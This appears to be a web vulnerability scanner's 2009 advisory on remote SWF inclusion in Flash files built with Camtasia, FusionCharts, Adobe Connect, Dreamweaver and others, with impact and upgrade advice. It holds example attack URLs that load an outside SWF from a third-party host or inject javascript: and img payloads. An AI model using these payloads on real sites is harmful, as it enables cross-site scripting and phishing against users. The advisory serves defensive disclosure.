Possible remote SWF inclusion

Possible remote SWF inclusion

Published on 2009-11-11. Updated on 2009-11-11.

Description:
A number of products used to create SWF files (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) were found vulnerable to remote SWF inclusion. This page includes a SWF file that is possibly affected by these vulnerabilities.

  • Adobe Dreamweaver and Contribute
    The "skinName" parameter loads an arbitrary flash file
    http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil
  • Adobe Acrobat Connect (including Macromedia Breeze):
    The "baseurl" parameter loads an arbitrary flash file:
    http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • InfoSoft FusionCharts:
    The "dataURL" parameter loads an arbitrary flash file:
    http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E
  • Techsmith Camtasia:
    The "csPreloader" parameter loads an arbitrary flash file:
    http://www.example.com/Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • Autodemo:
    The "onend" parameter loads arbitrary URLs including the JavaScript protocol handler:
    http://www.example.com/control.swf?onend=javascript:alert(1)//

Impact:
An attacker could include a remote SWF file and execute arbitrary JavaScript and/or ActionScript code. The attacker can use JavaScript to perform any action on behalf of the user (for example, perform a transaction on an online banking system) or change the way the website appears to the user (for example, perform a phishing attack).

Recommendation:
The product used to create this SWF file (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) should be upgraded to the latest version and the SWF file should be recompiled with the fixed version.

Tags: Scripts

Alert Tags: information_disclosure
ApplicableApplicationServer : All
ApplicableOS: All
ApplicableWebServer: All

References:

  • XSS Vulnerabilities in Common Shockwave Flash Files


    • Go Back